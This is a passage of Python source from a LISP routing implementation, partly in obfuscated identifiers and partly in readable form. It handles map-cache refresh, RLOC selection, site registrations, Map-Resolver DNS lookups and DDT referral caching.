return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def print_ttl ( self ) :
Oo0o0 = self . map_cache_ttl
if ( Oo0o0 == None ) : return ( "forever" )
if ( Oo0o0 >= 3600 ) :
if ( ( Oo0o0 % 3600 ) == 0 ) :
Oo0o0 = str ( Oo0o0 / 3600 ) + " hours"
else :
Oo0o0 = str ( Oo0o0 / 60 ) + " mins"
elif ( Oo0o0 >= 60 ) :
if ( ( Oo0o0 % 60 ) == 0 ) :
Oo0o0 = str ( Oo0o0 / 60 ) + " mins"
else :
Oo0o0 = str ( Oo0o0 ) + " secs"
else :
Oo0o0 = str ( Oo0o0 ) + " secs"
return ( Oo0o0 )
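#
# Decide whether this entry should be refreshed with a new Map-Request.
# Unicast entries refresh when actively used and the TTL has (nearly)
# elapsed; multicast entries refresh once per TTL interval, rate-limited
# to one Map-Request every 2 seconds.
#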
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
def refresh_multicast ( self ) :
Ooo0o0oo0 = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
II1II1 = ( Ooo0o0oo0 in [ 0 , 1 , 2 ] )
if ( II1II1 == False ) : return ( False )
IiI1i = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( IiI1i ) : return ( False )
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
Ooo0o0oo0 = time . time ( ) - self . last_refresh_time
if ( Ooo0o0oo0 >= self . map_cache_ttl ) : return ( True )
i1iIii1 = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( Ooo0o0oo0 >= i1iIii1 ) : return ( True )
return ( False )
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
Ooo0o0oo0 = time . time ( ) - self . stats . last_increment
return ( Ooo0o0oo0 <= 60 )
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
def delete_rlocs_from_rloc_probe_list ( self ) :
for I1II in self . best_rloc_set :
I1II . delete_from_rloc_probe_list ( self . eid , self . group )
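#
# Rebuild the best-RLOC set: find the numerically lowest (best) priority
# among up RLOCs and keep every RLOC at that priority or better. Entries
# dropped from the previous set are removed from the RLOC-probe list and
# the new members are (re)added.
#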
def build_best_rloc_set ( self ) :
iiI1III = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
iI1Iii = 256
for I1II in self . rloc_set :
if ( I1II . up_state ( ) ) : iI1Iii = min ( I1II . priority , iI1Iii )
for I1II in self . rloc_set :
if ( I1II . priority <= iI1Iii ) :
if ( I1II . unreach_state ( ) and I1II . last_rloc_probe == None ) :
I1II . last_rloc_probe = lisp_get_timestamp ( )
if 88 - 88: o0oOOo0O0Ooo % I1Ii111
self . best_rloc_set . append ( I1II )
for I1II in iiI1III :
if ( I1II . priority < iI1Iii ) : continue
I1II . delete_from_rloc_probe_list ( self . eid , self . group )
for I1II in self . best_rloc_set :
if ( I1II . rloc . is_null ( ) ) : continue
I1II . add_to_rloc_probe_list ( self . eid , self . group )
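#
# Select the RLOC to encapsulate to for a packet. A hash over the inner
# header (more bytes are hashed when lisp_load_split_pings is set)
# indexes into the best-RLOC set; if the chosen RLOC is not up, scan
# forward for one that is. Returns [rloc-address, port, nonce, action,
# rle, rloc-entry] with None in the slots that do not apply.
#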
def select_rloc ( self , lisp_packet , ipc_socket ) :
IiiiIi1iiii11 = lisp_packet . packet
I1IIiIiiiii1 = lisp_packet . inner_version
oOOoO0O = len ( self . best_rloc_set )
if ( oOOoO0O == 0 ) :
self . stats . increment ( len ( IiiiIi1iiii11 ) )
return ( [ None , None , None , self . action , None , None ] )
iIIiIIi = 4 if lisp_load_split_pings else 0
I1iI1111ii1I1 = lisp_packet . hash_ports ( )
if ( I1IIiIiiiii1 == 4 ) :
for iIi1I1 in range ( 8 + iIIiIIi ) :
I1iI1111ii1I1 = I1iI1111ii1I1 ^ struct . unpack ( "B" , IiiiIi1iiii11 [ iIi1I1 + 12 ] ) [ 0 ]
elif ( I1IIiIiiiii1 == 6 ) :
for iIi1I1 in range ( 0 , 32 + iIIiIIi , 4 ) :
I1iI1111ii1I1 = I1iI1111ii1I1 ^ struct . unpack ( "I" , IiiiIi1iiii11 [ iIi1I1 + 8 : iIi1I1 + 12 ] ) [ 0 ]
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 16 ) + ( I1iI1111ii1I1 & 0xffff )
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 8 ) + ( I1iI1111ii1I1 & 0xff )
else :
for iIi1I1 in range ( 0 , 12 + iIIiIIi , 4 ) :
I1iI1111ii1I1 = I1iI1111ii1I1 ^ struct . unpack ( "I" , IiiiIi1iiii11 [ iIi1I1 : iIi1I1 + 4 ] ) [ 0 ]
if ( lisp_data_plane_logging ) :
IiII1IIii1 = [ ]
for I1I111iIiI in self . best_rloc_set :
if ( I1I111iIiI . rloc . is_null ( ) ) : continue
IiII1IIii1 . append ( [ I1I111iIiI . rloc . print_address_no_iid ( ) , I1I111iIiI . print_state ( ) ] )
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( I1iI1111ii1I1 ) , I1iI1111ii1I1 % oOOoO0O , red ( str ( IiII1IIii1 ) , False ) ) )
I1II = self . best_rloc_set [ I1iI1111ii1I1 % oOOoO0O ]
oooooO0oO0o = lisp_get_echo_nonce ( I1II . rloc , None )
if ( oooooO0oO0o ) :
oooooO0oO0o . change_state ( I1II )
if ( I1II . no_echoed_nonce_state ( ) ) :
oooooO0oO0o . request_nonce_sent = None
if ( I1II . up_state ( ) == False ) :
IIi = I1iI1111ii1I1 % oOOoO0O
ooo = ( IIi + 1 ) % oOOoO0O
while ( ooo != IIi ) :
I1II = self . best_rloc_set [ ooo ]
if ( I1II . up_state ( ) ) : break
ooo = ( ooo + 1 ) % oOOoO0O
if ( ooo == IIi ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
I1II . stats . increment ( len ( IiiiIi1iiii11 ) )
if ( I1II . rle_name and I1II . rle == None ) :
if ( lisp_rle_list . has_key ( I1II . rle_name ) ) :
I1II . rle = lisp_rle_list [ I1II . rle_name ]
if ( I1II . rle ) : return ( [ None , None , None , None , I1II . rle , None ] )
if ( I1II . elp and I1II . elp . use_elp_node ) :
return ( [ I1II . elp . use_elp_node . address , None , None , None , None ,
None ] )
I11IiiiIi1i1I11I = None if ( I1II . rloc . is_null ( ) ) else I1II . rloc
Oo0o = I1II . translated_port
iI1IIi1I = self . action if ( I11IiiiIi1i1I11I == None ) else None
o0OOO = None
if ( oooooO0oO0o and oooooO0oO0o . request_nonce_timeout ( ) == False ) :
o0OOO = oooooO0oO0o . get_request_or_echo_nonce ( ipc_socket , I11IiiiIi1i1I11I )
return ( [ I11IiiiIi1i1I11I , Oo0o , o0OOO , iI1IIi1I , None , I1II ] )
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
for o0oO0O00 in self . rloc_set :
for I1II in rloc_address_set :
if ( I1II . is_exact_match ( o0oO0O00 . rloc ) == False ) : continue
I1II = None
break
if ( I1II == rloc_address_set [ - 1 ] ) : return ( False )
return ( True )
def get_rloc ( self , rloc ) :
for o0oO0O00 in self . rloc_set :
I1I111iIiI = o0oO0O00 . rloc
if ( rloc . is_exact_match ( I1I111iIiI ) ) : return ( o0oO0O00 )
return ( None )
def get_rloc_by_interface ( self , interface ) :
for o0oO0O00 in self . rloc_set :
if ( o0oO0O00 . interface == interface ) : return ( o0oO0O00 )
return ( None )
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
Oooo00oo = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( Oooo00oo == None ) :
Oooo00oo = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , Oooo00oo )
Oooo00oo . add_source_entry ( self )
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
o0oO0o00 = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0oO0o00 == None ) :
o0oO0o00 = lisp_mapping ( self . group , self . group , [ ] )
o0oO0o00 . eid . copy_address ( self . group )
o0oO0o00 . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , o0oO0o00 )
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0oO0o00 . group )
o0oO0o00 . add_source_entry ( self )
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
ii1111Ii = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( ii1111Ii ) )
else :
o0oO0o00 = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0oO0o00 == None ) : return
I11IIi1I11iI = o0oO0o00 . lookup_source_cache ( self . eid , True )
if ( I11IIi1I11iI == None ) : return
o0oO0o00 . source_cache . delete_cache ( self . eid )
if ( o0oO0o00 . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
IiIIi11i111 = "," + str ( self . secondary_iid )
return ( prefix . replace ( IiIIi11i111 , IiIIi11i111 + "*" ) )
def increment_decap_stats ( self , packet ) :
Oo0o = packet . udp_dport
if ( Oo0o == LISP_DATA_PORT ) :
I1II = self . get_rloc ( packet . outer_dest )
else :
for I1II in self . rloc_set :
if ( I1II . translated_port != 0 ) : break
if ( I1II != None ) : I1II . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
def rtrs_in_rloc_set ( self ) :
for I1II in self . rloc_set :
if ( I1II . is_rtr ( ) ) : return ( True )
if 73 - 73: OoOoOO00 * O0
return ( False )
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
class lisp_dynamic_eid ( ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
def get_timeout ( self , interface ) :
try :
I1iIiI = lisp_myinterfaces [ interface ]
self . timeout = I1iIiI . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
class lisp_group_mapping ( ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
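#
# lisp_is_group_more_specific
#
# Return the group-mapping prefix mask length when the supplied group
# address is more specific than the mapping's group-prefix, or -1 if not.
#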
def lisp_is_group_more_specific ( group_str , group_mapping ) :
IiIIi11i111 = group_mapping . group_prefix . instance_id
oO00OO0Ooo00O = group_mapping . group_prefix . mask_len
OOo0oOOO0 = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , IiIIi11i111 )
if ( OOo0oOOO0 . is_more_specific ( group_mapping . group_prefix ) ) : return ( oO00OO0Ooo00O )
return ( - 1 )
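#
# lisp_lookup_group
#
# Find the longest-matching configured group mapping for a group address.
# Returns None when no mapping covers the group.
#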
def lisp_lookup_group ( group ) :
IiII1IIii1 = None
for ii1i111 in lisp_group_mapping_list . values ( ) :
oO00OO0Ooo00O = lisp_is_group_more_specific ( group , ii1i111 )
if ( oO00OO0Ooo00O == - 1 ) : continue
if ( IiII1IIii1 == None or oO00OO0Ooo00O > IiII1IIii1 . group_prefix . mask_len ) : IiII1IIii1 = ii1i111
return ( IiII1IIii1 )
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site ( ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
class lisp_site_eid ( ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def print_flags ( self , html ) :
if ( html == False ) :
oOOO = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
O0o0ooo00o00 = self . print_flags ( False )
O0o0ooo00o00 = O0o0ooo00o00 . split ( "-" )
oOOO = ""
for OOo0 in O0o0ooo00o00 :
oOo = lisp_site_flags [ OOo0 . upper ( ) ]
oOo = oOo . format ( "" if OOo0 . isupper ( ) else "not " )
oOOO += lisp_span ( OOo0 , oOo )
if ( OOo0 . lower ( ) != "n" ) : oOOO += "-"
return ( oOOO )
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
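#
# Build a lexicographic sort key from the cache key of the EID and, when
# present, the group, embedding each mask length so prefixes of different
# lengths sort consistently.
#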
def build_sort_key ( self ) :
O0o0OOO = lisp_cache ( )
iiIi , o0Oo = O0o0OOO . build_key ( self . eid )
OO0OoOO = ""
if ( self . group . is_null ( ) == False ) :
iiiIiII , OO0OoOO = O0o0OOO . build_key ( self . group )
OO0OoOO = "-" + OO0OoOO [ 0 : 12 ] + "-" + str ( iiiIiII ) + "-" + OO0OoOO [ 12 : : ]
if 6 - 6: II111iiii + I1Ii111
o0Oo = o0Oo [ 0 : 12 ] + "-" + str ( iiIi ) + "-" + o0Oo [ 12 : : ] + OO0OoOO
del ( O0o0OOO )
return ( o0Oo )
def merge_in_site_eid ( self , child ) :
i111i11I = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
i111i11I = self . merge_rles_in_site_eid ( )
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
return ( i111i11I )
def copy_rloc_records ( self ) :
Oo0OOoO = [ ]
for o0oO0O00 in self . registered_rlocs :
Oo0OOoO . append ( copy . deepcopy ( o0oO0O00 ) )
return ( Oo0OOoO )
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for oOOOO0ooo in self . individual_registrations . values ( ) :
if ( self . site_id != oOOOO0ooo . site_id ) : continue
if ( oOOOO0ooo . registered == False ) : continue
self . registered_rlocs += oOOOO0ooo . copy_rloc_records ( )
Oo0OOoO = [ ]
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rloc . is_null ( ) or len ( Oo0OOoO ) == 0 ) :
Oo0OOoO . append ( o0oO0O00 )
continue
for OO00000 in Oo0OOoO :
if ( OO00000 . rloc . is_null ( ) ) : continue
if ( o0oO0O00 . rloc . is_exact_match ( OO00000 . rloc ) ) : break
if ( OO00000 == Oo0OOoO [ - 1 ] ) : Oo0OOoO . append ( o0oO0O00 )
self . registered_rlocs = Oo0OOoO
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
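#
# Merge the RLEs from all individual multicast registrations into a
# single RLE hung off the first registered RLOC. Returns True when the
# merged RLE node set changed, so the caller can act on the RLE change
# logged below.
#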
def merge_rles_in_site_eid ( self ) :
II1iI111 = { }
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rle == None ) : continue
for IiioOoo in o0oO0O00 . rle . rle_nodes :
o0o00O0oOooO0 = IiioOoo . address . print_address_no_iid ( )
II1iI111 [ o0o00O0oOooO0 ] = IiioOoo . address
break
self . merge_rlocs_in_site_eid ( )
OoOoooOoO = [ ]
for o0oO0O00 in self . registered_rlocs :
if ( self . registered_rlocs . index ( o0oO0O00 ) == 0 ) :
OoOoooOoO . append ( o0oO0O00 )
continue
if ( o0oO0O00 . rle == None ) : OoOoooOoO . append ( o0oO0O00 )
self . registered_rlocs = OoOoooOoO
iI1Ii11 = lisp_rle ( "" )
Ooooo000 = { }
IIiiI11iI = None
for oOOOO0ooo in self . individual_registrations . values ( ) :
if ( oOOOO0ooo . registered == False ) : continue
Ii1i1Ii1I = oOOOO0ooo . registered_rlocs [ 0 ] . rle
if ( Ii1i1Ii1I == None ) : continue
if 32 - 32: II111iiii . I1Ii111
IIiiI11iI = oOOOO0ooo . registered_rlocs [ 0 ] . rloc_name
for o0oOooo in Ii1i1Ii1I . rle_nodes :
o0o00O0oOooO0 = o0oOooo . address . print_address_no_iid ( )
if ( Ooooo000 . has_key ( o0o00O0oOooO0 ) ) : break
IiioOoo = lisp_rle_node ( )
IiioOoo . address . copy_address ( o0oOooo . address )
IiioOoo . level = o0oOooo . level
IiioOoo . rloc_name = IIiiI11iI
iI1Ii11 . rle_nodes . append ( IiioOoo )
Ooooo000 [ o0o00O0oOooO0 ] = o0oOooo . address
if ( len ( iI1Ii11 . rle_nodes ) == 0 ) : iI1Ii11 = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = iI1Ii11
if ( IIiiI11iI ) : self . registered_rlocs [ 0 ] . rloc_name = None
if ( II1iI111 . keys ( ) == Ooooo000 . keys ( ) ) : return ( False )
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) , II1iI111 . keys ( ) , Ooooo000 . keys ( ) ) )
return ( True )
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) :
iIiIi1I = lisp_site_eid ( self . site )
iIiIi1I . eid . copy_address ( self . group )
iIiIi1I . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , iIiIi1I )
iIiIi1I . parent_for_more_specifics = self . parent_for_more_specifics
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( iIiIi1I . group )
iIiIi1I . add_source_entry ( self )
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) : return
oOOOO0ooo = iIiIi1I . lookup_source_cache ( self . eid , True )
if ( oOOOO0ooo == None ) : return
if ( iIiIi1I . source_cache == None ) : return
iIiIi1I . source_cache . delete_cache ( self . eid )
if ( iIiIi1I . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
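#
# This more-specific entry was created under an accept-more-specifics
# parent; inherit the parent's configured policy and proxy-reply
# behavior.
#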
def inherit_from_ams_parent ( self ) :
O0Ii1IiiiI = self . parent_for_more_specifics
if ( O0Ii1IiiiI == None ) : return
self . force_proxy_reply = O0Ii1IiiiI . force_proxy_reply
self . force_nat_proxy_reply = O0Ii1IiiiI . force_nat_proxy_reply
self . force_ttl = O0Ii1IiiiI . force_ttl
self . pitr_proxy_reply_drop = O0Ii1IiiiI . pitr_proxy_reply_drop
self . proxy_reply_action = O0Ii1IiiiI . proxy_reply_action
self . echo_nonce_capable = O0Ii1IiiiI . echo_nonce_capable
self . policy = O0Ii1IiiiI . policy
self . require_signature = O0Ii1IiiiI . require_signature
self . encrypt_json = O0Ii1IiiiI . encrypt_json
def rtrs_in_rloc_set ( self ) :
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . is_rtr ( ) ) : return ( True )
return ( False )
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( o0oO0O00 . is_rtr ( ) ) : return ( True )
return ( False )
def is_rloc_in_rloc_set ( self , rloc ) :
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rle ) :
for iI1Ii11 in o0oO0O00 . rle . rle_nodes :
if ( iI1Ii11 . address . is_exact_match ( rloc ) ) : return ( True )
if ( o0oO0O00 . rloc . is_exact_match ( rloc ) ) : return ( True )
return ( False )
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
for o0oO0O00 in prev_rloc_set :
iiII111i1i = o0oO0O00 . rloc
if ( self . is_rloc_in_rloc_set ( iiII111i1i ) == False ) : return ( False )
if 64 - 64: ooOoO0o
return ( True )
if 23 - 23: Oo0Ooo . OoO0O00
if 49 - 49: oO0o % i11iIiiIii * Ii1I
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
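#
# lisp_mr
#
# One Map-Resolver entry, created either from a literal address or from a
# DNS name that is re-resolved periodically. Illustrative usage (assumed
# from the constructor below, not part of the original source):
#
#   lisp_mr("10.0.0.1", None, "all")        # literal address, inserted now
#   lisp_mr(None, "mr.example.com", None)   # address learned via DNS
#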
class lisp_mr():
    def __init__(self, addr_str, dns_name, mr_name):
        self.mr_name = mr_name if (mr_name != None) else "all"
        self.dns_name = dns_name
        self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0
        if (addr_str):
            self.map_resolver.store_address(addr_str)
            self.insert_mr()
        else:
            self.resolve_dns_name()
        self.last_used = 0
        self.last_reply = 0
        self.last_nonce = 0
        self.map_requests_sent = 0
        self.neg_map_replies_received = 0
        self.total_rtt = 0
    def resolve_dns_name(self):
        if (self.dns_name == None): return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30): return

        try:
            answer = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = answer[2]
        except:
            return

        #
        # If the A-record this entry was using is gone, remove the entry.
        #
        if (len(a_records) <= self.a_record_index):
            self.delete_mr()
            return

        addr = a_records[self.a_record_index]
        if (addr != self.map_resolver.print_address_no_iid()):
            self.delete_mr()
            self.map_resolver.store_address(addr)
            self.insert_mr()

        #
        # For a LISP-Decent DNS suffix, the first entry creates peer entries
        # for the other A-records returned.
        #
        if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
        if (self.a_record_index != 0): return

        for addr in a_records[1::]:
            a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
            mr = lisp_get_map_resolver(a, None)
            if (mr != None and mr.a_record_index == a_records.index(addr)):
                continue
            mr = lisp_mr(addr, None, None)
            mr.a_record_index = a_records.index(addr)
            mr.dns_name = self.dns_name
            mr.last_dns_resolve = lisp_get_timestamp()

        #
        # Remove entries whose addresses no longer appear in the A-records.
        #
        delete_list = []
        for mr in lisp_map_resolvers_list.values():
            if (self.dns_name != mr.dns_name): continue
            addr_str = mr.map_resolver.print_address_no_iid()
            if (addr_str in a_records): continue
            delete_list.append(mr)

        for mr in delete_list: mr.delete_mr()
    def insert_mr(self):
        key = self.mr_name + self.map_resolver.print_address()
        lisp_map_resolvers_list[key] = self

    def delete_mr(self):
        key = self.mr_name + self.map_resolver.print_address()
        if (lisp_map_resolvers_list.has_key(key) == False): return
        lisp_map_resolvers_list.pop(key)
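#
# lisp_ddt_root
#
# Configuration state for a DDT root: its RLOC, public key, and the
# priority/weight used to choose among multiple roots.
#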
class lisp_ddt_root():
    def __init__(self):
        self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.priority = 0
        self.weight = 0
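#
# lisp_referral
#
# A DDT referral cache entry for an (EID, group) tuple. Group entries carry
# a source_cache of (S,G) source entries, giving the same two-level lookup
# structure the site cache uses.
#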
class lisp_referral():
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_set = {}
        self.referral_type = LISP_DDT_ACTION_NULL
        self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_ttl = 0
        self.uptime = lisp_get_timestamp()
        self.expires = 0
        self.source_cache = None
    def print_referral(self, eid_indent, referral_indent):
        uts = lisp_print_elapsed(self.uptime)
        ets = lisp_print_future(self.expires)
        lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
            format(eid_indent, green(self.eid.print_prefix(), False), uts,
            ets, len(self.referral_set)))

        for ref_node in self.referral_set.values():
            ref_node.print_ref_node(referral_indent)
    def print_referral_type(self):
        if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
        if (self.referral_type == LISP_DDT_ACTION_NULL):
            return("null-referral")
        if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
            return("no-site-action")
        if (self.referral_type > LISP_DDT_ACTION_MAX):
            return("invalid-action")
        return(lisp_map_referral_action_string[self.referral_type])

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
    def print_ttl(self):
        ttl = self.referral_ttl
        if (ttl < 60): return(str(ttl) + " secs")

        if ((ttl % 60) == 0):
            ttl = str(ttl/60) + " mins"
        else:
            ttl = str(ttl) + " secs"
        return(ttl)

    def is_referral_negative(self):
        return(self.referral_type in (LISP_DDT_ACTION_MS_NOT_REG,
            LISP_DDT_ACTION_DELEGATION_HOLE, LISP_DDT_ACTION_NOT_AUTH))
    def add_cache(self):
        if (self.group.is_null()):
            lisp_referral_cache.add_cache(self.eid, self)
        else:
            group_entry = lisp_referral_cache.lookup_cache(self.group, True)
            if (group_entry == None):
                group_entry = lisp_referral()
                group_entry.eid.copy_address(self.group)
                group_entry.group.copy_address(self.group)
                lisp_referral_cache.add_cache(self.group, group_entry)
            if (self.eid.is_null()):
                self.eid.make_default_route(group_entry.group)
            group_entry.add_source_entry(self)

    def delete_cache(self):
        if (self.group.is_null()):
            lisp_referral_cache.delete_cache(self.eid)
        else:
            group_entry = lisp_referral_cache.lookup_cache(self.group, True)
            if (group_entry == None): return

            source_ref = group_entry.lookup_source_cache(self.eid, True)
            if (source_ref == None): return

            group_entry.source_cache.delete_cache(self.eid)
            if (group_entry.source_cache.cache_size() == 0):
                lisp_referral_cache.delete_cache(self.group)

